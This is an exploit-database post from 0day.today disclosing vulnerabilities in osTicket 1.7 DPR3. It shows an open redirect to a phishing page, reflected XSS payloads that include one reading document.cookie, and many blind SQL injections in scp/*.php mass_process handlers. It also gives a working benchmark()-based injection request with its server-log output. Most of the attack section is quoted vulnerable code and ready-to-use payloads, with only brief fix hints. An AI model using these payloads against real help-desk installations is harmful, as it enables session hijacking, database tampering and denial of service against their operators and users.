0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
osTicket 1.7 DPR3 XSS / Disclosure / Redirect / SQL Injection Vulnerabilities
[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
=================================================
Vulnerable Software: osTicket (v1.7-DPR3)
Official Site:http://www.osticket.com
Tested Version: osTicket (v1.7-DPR3)
Vulns: PATH DISCLOSURE+XSS+Open Redirect+Blind SQLi
=================================================
=================================================
Tested on:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.24
*/
=================================================
osTicket (v1.7-DPR3)
My suggestion is that:If possible after sucessfully installation of application give to user to protect that setup/ dir like button:
When the user press OK~PROTECT THIS DIR~ automatically create .htaccess(deny from all) file in setup/ dir.
Ok,now about vulns.
---------------------Open Redirect VUln--------------------------
l.php
http://192.168.0.15/learn/ostickRC/scp/l.php?url=http://somephish.site/phish.html
Open Redirect vulnerability.(Usefull for Phish)
If possible limit it only your to your own domain only.
+
If possible tokenize it too (antiCSRF to avoid risk)
------------------------------------------------------------------
=============================l.php XSS================================================
l.php XSS or script insertion.
// $url unsanitized
<?php
/*********************************************************************
l.php
Link redirection
Jared Hancock <jared@osticket.com>
Copyright (c) 2006-2012 osTicket
http://www.osticket.com
Released under the GNU General Public License WITHOUT ANY WARRANTY.
See LICENSE.TXT for details.
vim: expandtab sw=4 ts=4 sts=4:
**********************************************************************/
require 'secure.inc.php';
global $_GET;
$url = $_GET['url'];
if (!$url) exit();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="refresh" content="0;<?php echo $url; ?>"/>
</head>
<body/>
</html>
===========================================================================================
/include/ dir missing .htaccess (deny from all).
==================scp/l.php================================================================
/scp/l.php
http://192.168.0.15/learn/ostickRC/scp/l.php?url=<script>alert(1);</script>
XSS same l.php issuse:
===========================================================================================
scp/slas.php
BLIND SQL injection due direct usage $_POST['ids'] without sanitization (needs db_input())
====================scp/slas.php====================================================================
<?php
/*********************************************************************
slas.php
SLA - Service Level Agreements
Peter Rotich <peter@osticket.com>
Copyright (c) 2006-2012 osTicket
http://www.osticket.com
Released under the GNU General Public License WITHOUT ANY WARRANTY.
See LICENSE.TXT for details.
vim: expandtab sw=4 ts=4 sts=4:
**********************************************************************/
require('admin.inc.php');
include_once(INCLUDE_DIR.'class.sla.php');
$sla=null;
if($_REQUEST['id'] && !($sla=SLA::lookup($_REQUEST['id'])))
$errors['err']='Unknown or invalid API key ID.';
if($_POST){
switch(strtolower($_POST['do'])){
case 'update':
if(!$sla){
$errors['err']='Unknown or invalid SLA plan.';
}elseif($sla->update($_POST,$errors)){
$msg='SLA plan updated successfully';
}elseif(!$errors['err']){
$errors['err']='Error updating SLA plan. Try again!';
}
break;
case 'add':
if(($id=SLA::create($_POST,$errors))){
$msg='SLA plan added successfully';
$_REQUEST['a']=null;
}elseif(!$errors['err']){
$errors['err']='Unable to add SLA plan. Correct error(s) below and try again.';
}
break;
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one plan.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.SLA_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected SLA plans enabled';
else
$warn="$num of $count selected SLA plans enabled";
}else{
$errors['err']='Unable to enable selected SLA plans.';
}
}elseif($_POST['disable']){
$sql='UPDATE '.SLA_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected SLA plans disabled';
else
$warn="$num of $count selected SLA plans disabled";
}else{
$errors['err']='Unable to disable selected SLA plans';
}
}elseif($_POST['delete']){
$i=0;
foreach($_POST['ids'] as $k=>$v) {
if(($p=SLA::lookup($v)) && $p->delete())
$i++;
}
if($i && $i==$count)
$msg='Selected SLA plans deleted successfully';
elseif($i>0)
$warn="$i of $count selected SLA plans deleted";
elseif(!$errors['err'])
$errors['err']='Unable to delete selected SLA plans';
}else {
$errors['err']='Unknown action';
}
}
break;
default:
$errors['err']='Unknown action';
break;
}
}
$page='slaplans.inc.php';
if($sla || ($_REQUEST['a'] && !strcasecmp($_REQUEST['a'],'add')))
$page='slaplan.inc.php';
$nav->setTabActive('settings');
require(STAFFINC_DIR.'header.inc.php');
require(STAFFINC_DIR.$page);
include(STAFFINC_DIR.'footer.inc.php');
?>
=============================================================================================
Warning: is_readable() [function.is-readable]: open_basedir restriction in effect. File(/dev/urandom) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ostickRC\include\PasswordHash.php on line 51
BLIND SQL INJECTION.(I'm using here becnhmark() way to be more "sensitive" and detect vuln)
//scp/staff.php
again due direct usage implode(',',$_POST['ids']) in sql query without db_input().
snip from scp/staff.php
===============================================================================================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one staff member.';
}elseif(in_array($thisstaff->getId(),$_POST['ids'])) {
$errors['err']='You can not disable/delete yourself - you could be the only admin!';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.STAFF_TABLE.' SET isactive=1 WHERE staff_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected staff activated';
else
$warn="$num of $count selected staff activated";
}else{
$errors['err']='Unable to activate selected staff';
}
}elseif($_POST['disable']){
$sql='UPDATE '.STAFF_TABLE.' SET isactive=0 '.
'WHERE staff_id IN ('.implode(',',$_POST['ids']).') AND staff_id!='.db_input($thisstaff->getId());
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected staff disabled';
===============================================================================================
POST http://192.168.0.15/learn/ostickRC/scp/staff.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://192.168.0.15/learn/ostickRC/scp/staff.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: 192.168.0.15
Content-Length: 90
Cookie: ASPX=6372nnqs3u1oplhouh99s7b6a6rh7j66
do=mass_process&ids%5B%5D=1) or benchmark(50000000000000,md5(now())) or (1=0&enable=Enable
Works and i'm getting:
Possible DOS Attack Against MYSQL Server [Prevented]
Attack Prevented on: 16:04:02:468 01/06/2012
Attack Duration: 15 seconds
Command: Query
db: ost
Host: worker.com:1182
User: ost
Id: 548
Time: 15
State: init
Info: UPDATE ost170_staff SET isactive=1 WHERE staff_id IN (1) or benchmark(50000000000000,md5(now())) or (1=0)
=======================================================================================================================
Returned status code: http:504
[Fiddler] ReadResponse() failed: The server did not return a response for this request.
==============================================XSS==================================================
XSS:
http://192.168.0.15/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22
try to move your mouse over: Page: [1] Export you will see it.
parameter &status is vulnerable in this case.
====================================================================================================
Possible prone to sql injection:
include/class.staff.php
Notice: $teams
//$sql.=' AND team_id NOT IN('.implode(',', $teams).')';
Snip:
=================================
function updateTeams($teams) {
if($teams) {
foreach($teams as $k=>$id) {
$sql='INSERT IGNORE INTO '.TEAM_MEMBER_TABLE.' SET updated=NOW() '
.' ,staff_id='.db_input($this->getId()).', team_id='.db_input($id);
db_query($sql);
}
}
$sql='DELETE FROM '.TEAM_MEMBER_TABLE.' WHERE staff_id='.db_input($this->getId());
if($teams)
$sql.=' AND team_id NOT IN('.implode(',', $teams).')';
db_query($sql);
return true;
}
===================================
===================================================================================================
//include/class.staff.php
If possible sanitize all vars before passing it to syslogs:
============================= SNIP =================================
//If we get to this point we know the login failed.
$_SESSION['_staff']['strikes']+=1;
if(!$errors && $_SESSION['_staff']['strikes']>$cfg->getStaffMaxLogins()) {
$errors['err']='Forgot your login info? Contact Admin.';
$_SESSION['_staff']['laststrike']=time();
$alert='Excessive login attempts by a staff member?'."\n".
'Username: '.$_POST['username']."\n".'IP: '.$_SERVER['REMOTE_ADDR']."\n".'TIME: '.date('M j, Y, g:i a T')."\n\n".
'Attempts #'.$_SESSION['_staff']['strikes']."\n".'Timeout: '.($cfg->getStaffLoginTimeout()/60)." minutes \n\n";
Sys::log(LOG_ALERT,'Excessive login attempts ('.$_POST['username'].')', $alert,($cfg->alertONLoginError()));
} elseif($_SESSION['_staff']['strikes']%2==0) { //Log every other failed login attempt as a warning.
$alert='Username: '.$_POST['username']."\n".'IP: '.$_SERVER['REMOTE_ADDR'].
"\n".'TIME: '.date('M j, Y, g:i a T')."\n\n".'Attempts #'.$_SESSION['_staff']['strikes'];
Sys::log(LOG_WARNING,'Failed staff login attempt ('.$_POST['username'].')', $alert);
}
return false;
}
============================= EOF SNIP===============================
scp/departments.php
SQL injection:
===========================================================================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one department';
}elseif(!$_POST['public'] && in_array($cfg->getDefaultDeptId(),$_POST['ids'])) {
$errors['err']='You can not disable/delete a default department. Remove default Dept. and try again.';
}else{
$count=count($_POST['ids']);
if($_POST['public']){
$sql='UPDATE '.DEPT_TABLE.' SET ispublic=1 WHERE dept_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected departments made public';
else
$warn="$num of $count selected departments made public";
}else{
$errors['err']='Unable to make selected department public.';
}
}elseif($_POST['private']){
$sql='UPDATE '.DEPT_TABLE.' SET ispublic=0 '.
'WHERE dept_id IN ('.implode(',',$_POST['ids']).') AND dept_id!='.db_input($cfg->getDefaultDeptId());
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected departments made private';
else
$warn="$num of $count selected departments made private";
}else{
$errors['err']='Unable to make selected department(s) private. Possibly already private!';
}
}elseif($_POST['delete']){
//Deny all deletes if one of the selections has members in it.
$sql='SELECT count(staff_id) FROM '.STAFF_TABLE.' WHERE dept_id IN ('.implode(',',$_POST['ids']).')';
list($members)=db_fetch_row(db_query($sql));
if($members)
============================================================================
============================================================================
//scp/templates.php
blind SQL injection
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one template to process.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.EMAIL_TEMPLATE_TABLE.' SET isactive=1 WHERE tpl_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected templates enabled';
else
$warn="$num of $count selected templates enabled";
}else{
======================= EOF SNIP=======================
//scp/teams.php
Blind SQl injection again:
Notice: WHERE team_id IN ('.implode(',',$_POST['ids']).')
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one team.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.TEAM_TABLE.' SET isenabled=1 WHERE team_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected teams activated';
else
$warn="$num of $count selected teams activated";
}else{
$errors['err']='Unable to activate selected teams';
}
}elseif($_POST['disable']){
$sql='UPDATE '.TEAM_TABLE.' SET isenabled=0 WHERE team_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
=============================================================
//scp/syslogs.php
Blind Sql Injection:
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one log to delete';
}else{
$count=count($_POST['ids']);
if($_POST['delete']){
$sql='DELETE FROM '.SYSLOG_TABLE.' WHERE log_id IN ('.implode(',',$_POST['ids']).')';
==============================================================
//scp/helptopics.php
Blind SQL Injection:
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one help topic';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.TOPIC_TABLE.' SET isactive=1 WHERE topic_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected help topics enabled';
else
$warn="$num of $count selected help topics enabled";
}else{
$errors['err']='Unable to enable selected help topics.';
}
}elseif($_POST['disable']){
$sql='UPDATE '.TOPIC_TABLE.' SET isactive=0 WHERE topic_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
=============================================================
=============================================================
//scp/groups.php
Blind Sql Injection again due implode(',',$_POST['ids']) thing in sql query.
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one group.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.GROUP_TABLE.' SET group_enabled=1, updated=NOW() WHERE group_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected groups activated';
else
$warn="$num of $count selected groups activated";
}else{
$errors['err']='Unable to activate selected groups';
}
}elseif($_POST['disable']){
$sql='UPDATE '.GROUP_TABLE.' SET group_enabled=0, updated=NOW() WHERE group_id IN ('.implode(',',$_POST['ids']).')';
============================================================
//scp/filters.php
Blind Sql Injection:
==================SNIP========================================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one filter to process.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.EMAIL_FILTER_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected filters enabled';
else
$warn="$num of $count selected filters enabled";
}else{
$errors['err']='Unable to enable selected filters';
}
}elseif($_POST['disable']){
$sql='UPDATE '.EMAIL_FILTER_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected filters disabled';
else
=====================EOF SNIP=================================
include/class.faq.php
Vulnerable to Blind SQL Injection but a bit hard to exploit it.
Notice:
if($ids)
$sql.=' AND topic_id NOT IN('.implode(',',$ids).')';
db_query($sql);
==================SNIP========================================
function updateTopics($ids){
if($ids) {
$topics = $this->getHelpTopicsIds();
foreach($ids as $k=>$id) {
if($topics && in_array($id,$topics)) continue;
$sql='INSERT IGNORE INTO '.FAQ_TOPIC_TABLE
.' SET faq_id='.db_input($this->getId())
.', topic_id='.db_input($id);
db_query($sql);
}
}
$sql='DELETE FROM '.FAQ_TOPIC_TABLE.' WHERE faq_id='.db_input($this->getId());
if($ids)
$sql.=' AND topic_id NOT IN('.implode(',',$ids).')';
db_query($sql);
return true;
}
=====================EOF SNIP=================================
/scp/emails.php
Blind SQl Injection:
===================SNIP==========================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one email address';
}else{
$count=count($_POST['ids']);
$sql='SELECT count(dept_id) FROM '.DEPT_TABLE.' dept '.
'WHERE email_id IN ('.implode(',',$_POST['ids']).') OR autoresp_email_id IN ('.implode(',',$_POST['ids']).')';
list($depts)=db_fetch_row(db_query($sql));
==================EOF=============================
//scp/categories.php
Blind SQl Inj:
Notice: usage of implode(',',$_POST['ids']) directly without any sanitization in SQL query.
===================SNIP==========================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one category';
} else {
$count=count($_POST['ids']);
if($_POST['public']) {
$sql='UPDATE '.FAQ_CATEGORY_TABLE.' SET ispublic=1 WHERE category_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected categories made PUBLIC';
else
$warn="$num of $count selected categories made PUBLIC";
} else {
$errors['err']='Unable to enable selected categories public.';
}
} elseif($_POST['private']) {
$sql='UPDATE '.FAQ_CATEGORY_TABLE.' SET ispublic=0 WHERE category_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected categories made PRIVATE';
=====================EOF SNIP=================================
//scp/canned.php
Blind SQl Injection:
===================SNIP==========================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one canned response';
} else {
$count=count($_POST['ids']);
if($_POST['enable']) {
$sql='UPDATE '.CANNED_TABLE.' SET isenabled=1 WHERE canned_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected canned replies enabled';
else
$warn="$num of $count selected canned replies enabled";
} else {
$errors['err']='Unable to enable selected canned replies.';
}
} elseif($_POST['disable']) {
$sql='UPDATE '.CANNED_TABLE.' SET isenabled=0 WHERE canned_id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected canned replies disabled';
else
$warn="$num of $count selected canned replies disabled";
} else {
=====================EOF SNIP========================
//scp//banlist.php
Blind SQl Injection:
Notice:
' AND id IN ('.implode(',',$_POST['ids']).')'
===================SNIP==========================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one email to process.';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.EMAIL_FILTER_RULE_TABLE.' SET isactive=1 WHERE filter_id='.db_input($filter->getId()).
' AND id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected emails ban status set to enabled';
else
$warn="$num of $count selected emails enabled";
}else{
$errors['err']='Unable to enable selected emails';
}
}elseif($_POST['disable']){
$sql='UPDATE '.EMAIL_FILTER_RULE_TABLE.' SET isactive=0 WHERE filter_id='.db_input($filter->getId()).
' AND id IN ('.implode(',',$_POST['ids']).')';
=====================EOF SNIP========================
//scp/apikeys.php
===================SNIP==========================
case 'mass_process':
if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) {
$errors['err']='You must select at least one API key';
}else{
$count=count($_POST['ids']);
if($_POST['enable']){
$sql='UPDATE '.API_KEY_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())){
if($num==$count)
$msg='Selected API keys enabled';
else
$warn="$num of $count selected API keys enabled";
}else{
$errors['err']='Unable to enable selected API keys.';
}
}elseif($_POST['disable']){
$sql='UPDATE '.API_KEY_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')';
if(db_query($sql) && ($num=db_affected_rows())) {
if($num==$count)
$msg='Selected API keys disabled';
else
=====================EOF SNIP========================
XSS (Cross Site Scripting Vuln) directory.php parameter q.
http://192.168.0.15/learn/ostickRC/scp/directory.php?q=100%22+onmouseover%3D%22alert%281%29%22&did=0&submit=Filter
parameter &q is vulnerable in this case
http://192.168.0.15/learn/ostickRC/scp/directory.php?q=100%22/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Payload: "/><script>alert(document.cookie);</script>"
>From source of code page:
<form action="directory.php" method="GET" name="filter">
<input type="text" name="q" value="100"/><script>alert(document.cookie);</script>" >
<select name="did" id="did">
<option value="0">— All Department —</option>
<option value="2" >Billing (1)</option><option value="1" >Support (1)</option> </select>
&nbps;&nbps;
<input type="submit" name="submit" value="Filter"/>
</form>
And obviously we will get cookie.
=========================== HAPPY NEW YEAR! ==================================
================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
# 0day.today [2024-09-28] #